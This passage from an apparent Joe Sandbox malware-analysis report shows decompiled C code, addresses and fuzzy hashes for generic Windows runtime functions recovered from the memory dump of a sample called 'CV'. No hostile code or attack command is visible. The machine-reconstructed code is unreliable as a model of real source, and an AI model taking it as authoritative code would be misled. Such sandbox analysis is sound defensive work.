					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t4 = _t68 + 7; // 0xa
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = _t4 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E01286EBE(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E01276A60(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}

0x01286de6
0x01286dee
0x01286df1
0x01286df4
0x01286dfd
0x012c05d3
0x012c05d3
0x012c05e4
0x012c05f9
0x012c05f9
0x012c05fe
0x01286e96
0x01286e9c
0x01286e9c
0x01286e03
0x01286e09
0x01286e0c
0x01286e12
0x01286e15
0x01286e1b
0x012c05a1
0x01286eb1
0x01286eb1
0x01286eb1
0x01286e21
0x01286e2a
0x01286e9f
0x01286eab
0x00000000
0x00000000
0x00000000
0x01286eab
0x01286e2c
0x01286e34
0x00000000
0x01286e3d
0x01286e3d
0x01286e42
0x01286e4d
0x012c05ac
0x012c05b2
0x012c05b2
0x00000000
0x012c05ac
0x01286e56
0x01286e59
0x01286e5d
0x01286e5f
0x01286e64
0x01286e94
0x01286e94
0x00000000
0x01286e94
0x01286e6a
0x01286e6d
0x012c05ba
0x012c05bd
0x012c05ca
0x012c05cc
0x01286e91
0x01286e91
0x00000000
0x01286e91
0x012c05c0
0x00000000
0x012c05c0
0x01286e7e
0x01286e7e
0x01286e80
0x01286e86
0x00000000
0x00000000
0x01286eba
0x01286eba
0x01286e88
0x01286e8b
0x01286e8f
0x00000000
0x01286e8f

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction ID: feed9dad376fa3b0ed17c52fedef76f5962c90a6d46ee806410622819974e7ac
Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction Fuzzy Hash: 2731D231625202DFC724DF29C080AAAB7E6FFC5315B14C95EE61A8B281DB71F802CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0127A70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0127A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1337b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1337b10 = 8;
					 *0x1337b14 = 0x1337b0c;
					 *0x1337b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0127A990(0x1337b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0127A840(__edx, __ecx, __ecx, _t52, 0x1337b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1337b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1337b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1337b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01264620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1337b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0128F3E0(_t50,  *0x1337b14, _t8 >> 3);
						_t28 =  *0x1337b14; // 0x0
						__eflags = _t28 - 0x1337b0c;
						if(_t28 != 0x1337b0c) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1337b14 = _t50;
						_t48 = _v12;
						 *0x1337b10 = _t9;
						goto L6;
					}
					 *0x1337b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0127a713
0x0127a714
0x0127a717
0x0127a71d
0x0127a720
0x0127a722
0x0127a727
0x0127a74a
0x0127a754
0x0127a75e
0x0127a768
0x0127a76a
0x0127a773
0x0127a78b
0x0127a790
0x0127a792
0x0127a741
0x0127a741
0x0127a743
0x0127a749
0x0127a749
0x0127a732
0x0127a73a
0x0127a797
0x0127a79d
0x0127a7a3
0x0127a7a9
0x0127a7b6
0x0127a7bc
0x0127a7ca
0x0127a7e0
0x0127a7e2
0x0127a7e4
0x012b9bf2
0x00000000
0x012b9bf2
0x0127a7ed
0x0127a7f2
0x0127a800
0x0127a805
0x0127a80d
0x0127a812
0x012b9c08
0x012b9c08
0x0127a818
0x0127a81b
0x0127a821
0x0127a824
0x00000000
0x0127a824
0x0127a7ae
0x00000000
0x0127a7ae
0x0127a73c
0x0127a73e
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f37e0404772dbf9add53d163361b103aead80ff573ac8c7c078d18ef1b1584
Instruction ID: 4f4a73c329403736de123ef65c7f0665d03187c63c372ab984c7c61e0c498791
Opcode Fuzzy Hash: d4f37e0404772dbf9add53d163361b103aead80ff573ac8c7c078d18ef1b1584
Instruction Fuzzy Hash: E631CFF1620205DFD729CF18D881F6EBBFDFB85720F18495AE20687244D7B4A941CB95

Uniqueness

Uniqueness Score: -1.00%

Function 012761A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E012761A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01275E50(0x12267cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01319D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0124F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x012761b3
0x012761b5
0x012761bd
0x012761c3
0x012761c7
0x012761d2
0x012761ff
0x012761ff
0x01276201
0x01276207
0x01276207
0x012761d4
0x012761d9
0x00000000
0x00000000
0x012761df
0x012761e2
0x00000000
0x00000000
0x012761e6
0x012761e8
0x012761ee
0x012761ee
0x012761f9
0x012b762f
0x012b7632
0x012b7635
0x012b7639
0x012b7640
0x012b766e
0x012b7675
0x00000000
0x00000000
0x012b7681
0x012b7689
0x012b768d
0x012b7691
0x012b7695
0x012b7699
0x012b76af
0x012b76b5
0x012b76b7
0x012b76b7
0x012b76d7
0x012b76dc
0x00000000
0x012b76dc
0x012b76a2
0x012b76a9
0x012b7651
0x012b7653
0x012b7653
0x012b7656
0x012b7656
0x00000000
0x012b7656
0x012b7644
0x012b7646
0x012b7648
0x012b7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eba491444785029fe1830dc4095a85a06dfcb4c9588f8161504f361b7cdc7ed3
Instruction ID: 3c032b86a8a5dfe17d241f662a149eedf21f8c897a2e423a98f049845c1db50c
Opcode Fuzzy Hash: eba491444785029fe1830dc4095a85a06dfcb4c9588f8161504f361b7cdc7ed3
Instruction Fuzzy Hash: BA31AE716257028FE360CF0DC840B67BBE4FB98B00F08496DEA949B391E7B0E804CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0124AA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0124AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x133d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1337b9c; // 0x0
					_t53 = L01264620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0128B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0128F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01256C59(_t53, _t51, _t58) != 0) {
							_t28 = E01275E50(0x122c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0127B230(_v32, _v28, 0x122c2d8, 1,  &_v24);
								_t28 = E0124F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0124aa25
0x0124aa29
0x0124aa2d
0x0124aa30
0x0124aa37
0x0124aa3c
0x012a4458
0x012a4458
0x012a4472
0x012a4474
0x012a4476
0x0124aa64
0x0124aa74
0x012a447c
0x012a4483
0x012a4492
0x0124aa52
0x0124aa54
0x0124aa5e
0x012a44a8
0x012a44ad
0x012a44af
0x012a44b6
0x012a44b6
0x012a44b9
0x012a44bc
0x012a44cd
0x012a44d3
0x012a44d6
0x012a44e1
0x012a44e1
0x012a44e6
0x012a44e8
0x012a44fb
0x012a44fb
0x012a44e8
0x00000000
0x0124aa5e
0x012a4476
0x0124aa42
0x0124aa46
0x0124aa48
0x0124aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4fa94687ce12c20a62aedf3d524c288e013b2c47a1b44ccb9df8dc6b44397eb
Instruction ID: 98453f675e671d32cac06305c9587ded9f1442e4eb644ab81a53acae3a304ebc
Opcode Fuzzy Hash: d4fa94687ce12c20a62aedf3d524c288e013b2c47a1b44ccb9df8dc6b44397eb
Instruction Fuzzy Hash: 2631C371A2022AABCB15AF68CD81ABFB7B8EF44700F454469F901EB250E7749D51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01288EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01288EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x133d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01274E70(0x13386e4, 0x1289490, 0, 0);
					if( *0x13353e8 > 5 && E01288F33(0x13353e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x13353e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x13353e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x122bc46;
						_t48 = E012C7B9C(0x13353e8, 0x122bc46, _t67, 0x13353e8, _t70,  &_v140);
					}
				}
				return E0128B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x01288ec7
0x01288ed9
0x01288edc
0x01288ee6
0x01288ee9
0x01288eee
0x01288efc
0x01288f08
0x012c1349
0x012c1353
0x012c135d
0x012c1366
0x012c136f
0x012c1375
0x012c137c
0x012c1385
0x012c1390
0x012c1391
0x012c139c
0x012c139d
0x012c13a6
0x012c13ac
0x012c13b2
0x012c13b5
0x012c13bc
0x012c13bf
0x012c13c2
0x012c13c5
0x012c13c8
0x012c13cb
0x012c13ce
0x012c13d1
0x012c13d4
0x012c13d7
0x012c13da
0x012c13dd
0x012c13e0
0x012c13e3
0x012c13e6
0x012c13e9
0x012c13f6
0x012c1400
0x012c1400
0x01288f08
0x01288f32

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0752c872c91e7e38ed5178248761ebe1a3c2508ac58abcf276d313a882f91ffb
Instruction ID: 2d0e2d782ccfb6a0024d8c517247852a479f1cd6989458f94e2d09d37bb2bd96
Opcode Fuzzy Hash: 0752c872c91e7e38ed5178248761ebe1a3c2508ac58abcf276d313a882f91ffb
Instruction Fuzzy Hash: D741C2B1D113189FDB20DFAAD981AADFBF4FB48710F9041AEE609A7240E7705A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0127E730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0127E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01289670() < 0) {
					E0129DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1337b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01264620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0127E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0127e730
0x0127e736
0x0127e738
0x0127e73d
0x0127e73e
0x0127e740
0x0127e749
0x0127e765
0x0127e76a
0x0127e76b
0x0127e76c
0x0127e76d
0x0127e76e
0x0127e76f
0x0127e775
0x0127e777
0x0127e77e
0x012bb675
0x0127e784
0x0127e784
0x0127e789
0x0127e7a8
0x0127e7ac
0x0127e807
0x0127e7ae
0x0127e7ae
0x0127e7b1
0x0127e7b4
0x0127e7b9
0x0127e7c0
0x0127e7c4
0x0127e7ca
0x0127e7cc
0x00000000
0x0127e7d3
0x0127e7d6
0x00000000
0x00000000
0x0127e7ff
0x0127e802
0x00000000
0x00000000
0x0127e7f9
0x0127e7fc
0x00000000
0x00000000
0x0127e7f3
0x0127e7f6
0x00000000
0x00000000
0x0127e7ed
0x0127e7f0
0x00000000
0x00000000
0x0127e7e7
0x0127e7ea
0x00000000
0x00000000
0x012bb685
0x012bb688
0x00000000
0x00000000
0x012bb682
0x00000000
0x00000000
0x0127e7cc
0x0127e7d9
0x0127e7dc
0x0127e7de
0x0127e7de
0x0127e7ac
0x0127e7e4
0x0127e74b
0x0127e751
0x0127e759
0x0127e761
0x0127e761

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 319b0ef6c0dce6b6d19ee549e27095ed1f2a8a31167651531effa2cacc274788
Instruction ID: 2fd4008d39120350a8a7353758188b20329151c35b60d4d40b8f5ed00e9e5ce8
Opcode Fuzzy Hash: 319b0ef6c0dce6b6d19ee549e27095ed1f2a8a31167651531effa2cacc274788
Instruction Fuzzy Hash: 6B318D75A24249EFD704DF58D841B9AFBE8FB09314F158296FA04CB381D671EC80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0127BC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0127BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1336100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01262280(0xd, 0x600f1a0);
				_t41 =  *0x13360f8; // 0x0
				if(_t41 != 0) {
					 *0x13360f8 =  *_t41;
					 *0x13360fc =  *0x13360fc + 0xffff;
				}
				E0125FFB0(_t41, 0x800, 0x600f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x13360f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01264620(0x1336100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1336100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0127bc36
0x0127bc42
0x0127bc45
0x0127bc4a
0x0127bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0127bc50
0x0127bc50
0x0127bc58
0x0127bc5a
0x0127bc60
0x00000000
0x00000000
0x012ba4f2
0x012ba4f6
0x00000000
0x00000000
0x00000000
0x012ba4fc
0x0127bc79
0x0127bc7e
0x0127bc86
0x0127bd16
0x0127bd20
0x0127bd20
0x0127bc8d
0x0127bc94
0x0127bcbd
0x0127bcca
0x0127bccb
0x0127bccc
0x0127bccd
0x0127bcce
0x0127bcd4
0x0127bcea
0x0127bcee
0x0127bcf2
0x0127bd00
0x0127bd04
0x00000000
0x0127bc96
0x0127bcab
0x0127bcaf
0x0127bd2c
0x0127bd2c
0x0127bd09
0x00000000
0x0127bd09
0x0127bcb1
0x0127bcb5
0x0127bcbb
0x00000000
0x00000000
0x00000000
0x0127bcbb

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa794b57d497be528a82bb780a6d44fcfe513918a5d81ea805f4ee3bd0da9169
Instruction ID: e4170f54ec92facd522f62e78cf26f5d33880d0bce8c24649827b124f4e9643b
Opcode Fuzzy Hash: fa794b57d497be528a82bb780a6d44fcfe513918a5d81ea805f4ee3bd0da9169
Instruction Fuzzy Hash: 9A31DF76A20616AFCB11DF58D4C27A777B8FB18310F044179EE44DB245E674DA458B84

Uniqueness

Uniqueness Score: -1.00%

Function 01249100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01249100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x131f6e8);
				E0129D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E013188F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0129D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x13386c0; // 0xca07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x13386b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01262280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E013188F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
